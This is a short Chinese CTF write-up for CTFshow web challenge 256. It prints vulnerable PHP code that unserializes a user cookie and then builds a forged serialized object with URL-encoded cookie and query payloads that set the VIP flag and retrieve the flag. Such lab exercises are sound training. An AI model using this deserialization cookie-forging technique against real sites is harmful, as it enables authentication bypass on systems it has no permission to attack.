CTFshow-Web入门-反序列化-256题
1、代码审计
<?php
error_reporting(0);
highlight_file(__FILE__);
include('flag.php');
class ctfShowUser{
public $username='xxxxxx';
public $password='xxxxxx';
public $isVip=false;
public function checkVip(){
return $this->isVip;
}
public function login($u,$p){
return $this->username===$u&&$this->password===$p;
}
public function vipOneKeyGetFlag(){
if($this->isVip){
global $flag;
if($this->username!==$this->password){
echo "your flag is ".$flag;
}
}else{
echo "no vip, no flag";
}
}
}
$username=$_GET['username'];
$password=$_GET['password'];
if(isset($username) && isset($password)){
$user = unserialize($_COOKIE['user']);
if($user->login($username,$password)){
if($user->checkVip()){
$user->vipOneKeyGetFlag();
}
}else{
echo "no vip,no flag";
}
}
根据逻辑要求:
- 用户名密码必须和类中的一致,但不能完全相同;
- $isvip要是true。
2、保留有用部分,构造链
<?php
class ctfShowUser{
public $username='5';
public $password='5.0';
public $isVip=true;
}
$a = new ctfShowUser();
echo urlencode(serialize($a));
payload:
url:?username=5&password=5.0
cookie:user=O%3A11%3A%22ctfShowUser%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A1%3A%225%22%3Bs%3A8%3A%22password%22%3Bs%3A3%3A%225.0%22%3Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D
为了满足提到的要求,那就保留需要部分,生成链
拿到flag:
浙公网安备 33010602011771号